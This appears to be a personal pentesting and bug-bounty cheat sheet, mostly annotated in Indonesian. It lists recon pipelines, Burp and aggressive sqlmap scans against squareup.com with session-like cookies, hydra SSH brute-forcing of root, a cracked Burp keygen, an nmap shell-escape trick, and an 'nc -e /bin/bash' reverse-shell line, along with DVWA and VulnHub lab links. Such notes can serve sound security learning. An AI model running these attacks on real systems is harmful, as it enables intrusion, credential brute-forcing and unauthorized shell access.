taksel ( aplikasi )
ps aux | grep ( melihat service yang jalan )
ntpd -gq ( syncron jam )
ntpdate -v pool.ntpd.org ( syncron waktu zona )
.*\.squareup\.com$ ( scan scope burp )
sebelum paralle install dulu menggunakan apt install parallel
cat redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
( scan burp )
buka burp
java -jar (burp-loader-keygen-2_1_07.jar)
ganti versi java di linux
sudo update-alternatives --config java
syncronace date
ntpd -gq
ntpdate -v pool.ntp.org ( syncron dengan server )
ntpda
cari nama domain
cat wilcards | assetfinder --subs-only | anew domains
cari host port 80
cat domains | httprobe -c 80 --prefer-https | anew hosts
cari domain
findomain -f wilcards | tee -a findomain.out
nmap -sP scan service port /24
nmap -v --script vuln ( scan vuln )
cat from-findomain | anew domains | httprobe -c 50 | anew hosts2
caRI ROOT
cat hosts2 | fff -d 1 -S -o roots
masuk ke directory
find . -type f | nano -
grep -hri host22 | anew
1650 grep -hri host22 | anew
grep -hri host23 | anew
1678 ls
1679 gf debug-pages
1680 gf firebase
1681 gf http-auth
1682 gf
1683 gf --help
1684 gf --list
1685 gf xss
gf servers
1689 gf meg-headers
find . -type f | nano
1694 find . -type f | nano -
1695 clear
1696 gf servers | anew
1697 gf meg-headers | nano -
waybackurls api.bugcrowd.com | nano -
1708 curl -vs https://api.bugcrowd.com/robots.txt
1709 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt'
1710 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
1711 ls
1712 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
find . -type f -name *.body | wc
1731 gf aws-keys
curl -vs https://api.bugcrowd.com/robots.txt | nano -
1881 curl -vs https://api.bugcrowd.com/robots.txt
httpx -o httpx.txt
echo "nama domain" | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | tee -a test.txt
cat wilcards cat wilcards | assetfinder --subs-only | anew domains | | httprobe -c 80 --prefer-https
cat wilcards | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | anew domains | cat domains | httpx -o aktif
subfinder -d domain | tee
assetfinder --subs-only domain | tee
cat domain(nama domain yang mau di sortir) | sort -u | tee simpan
cat httpx
cat domain | httpx -follow-redirects -status-code -vhost -threads 300 -silent | sort -u | grep "[200]" | cut -d [ -f | sort -u | sed 's/[[:blank:]]*$//' | tee domain
nuclei
sqlmap -u 'https://squareup.com/dashboard/?%27ty%27im!%27#{''''@qw.com' -technique=BEUSTQ --random-agent --risk 3 --level 5 --crawl 10
'_savt=8b8c3c1b-1f...1588e7a635;_onboard_session=UTRKbzJVVkh...45ba573c53;squareGeo=CH-ZH'
tools
ffuf
byp4xx
rapidscan
httpsmuggler / defparam/smuggler
breacher
python3 -c 'ímport pty:pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -m http.server
export TERM=xterm
install repo github agar bisa digunakan secara general
go build . mv /usr/local/bin/
sqlmap -r ( untuk burp atau metode post)
sqlmap -m ( untuk link misal dari gf sqli )
sqlmap -p untuk parameter
sqlmap --force-ssl untul sssl nya
Untuk filter tulisan
cat scan_aktiftest.txt | cut -d " " -f 4,5,6 | sort -u >> filter.txt
Repo github
1. git init
2. git remote add origin https://github.com/NamaRepo/S.git
git add
git commit -m "first commit"
git push origin masterecho "# ZIMBRA" >> README.md git init git add README.md git commit -m "first commit" git branch -M main git remote add origin https://github.com/x0x0r/ZIMBRA.git git push -u origin main
tools scan port
https://gitlab.com/pokoyo.bughunter/web-security-bug-hunting-trainings/-/issues/433https://pypi.org/project/threader3000/https://github.com/dievus/threader3000
https://github.com/RustScan/RustScanhttps://www.youtube.com/watch?v=fGG7BMS-RZI
https://www.geeksforgeeks.org/rustscan-faster-nmap-scanning-with-rust/
https://www.geeksforgeeks.org/vulscan-vulnerability-scanning-with-nmap-in-kali-linux/
Link belajar
https://www.hackingarticles.in/ctf-challenges-walkthrough/
https://www.hackingarticles.in/corrosion-2-vulnhub-walkthrough/
https://www.vulnhub.com/entry/corrosion-2,745/
bruteforce
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.107 ssh Command dasar dokcer compose dan docker file
docker-compose up -d ( buat install )
docker-compose ps -a liat status docker
docker container rm (rmi) ( nama kontainer ) hapus kontainer
docker images prune ( nama kontainer ) hapus images
docker container ls
docker images ls
docker container exec -it (nama kontainer) /bin/bash
docker container start ( nama kontainer )
select * from users;
https://github.com/Darkness4/dvwa-docker.git
https://github.com/Darkness4/dvwa-docker
https://github.com/cytopia/docker-dvwa
https://github.com/digininja/DVWA
tools
https://www.bugbountyhunter.com/guides/?type=bugbounty_toolkit
commad cari hash
echo -n "hash nya" | base64 -d
-d ( decrypt nya )
bypass nmap
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF https://gtfobins.github.io/gtfobins/nmap/
nc -lnvp
l = listen
n = ip only ( ip yang terbuka )
v = verbose
p = port
contoh nc -lvnp -s
s = source
nc -e /bin/bash ( ip ) (port)
echo -n ( masukin hash nya ) | base64 -d ( untuk cari hash encrypsi)
osint https://sploitus.com/ https://hunter.how/
web archive cdx api
https://archive.org/developers/wayback-cdx-server.html
https://viewdns.info/
http://web.archive.org/cdx/search/cdx?url=*.api.bugcrowd.com&collapse=urlkey&matchType=prefix CVE-2024-4577
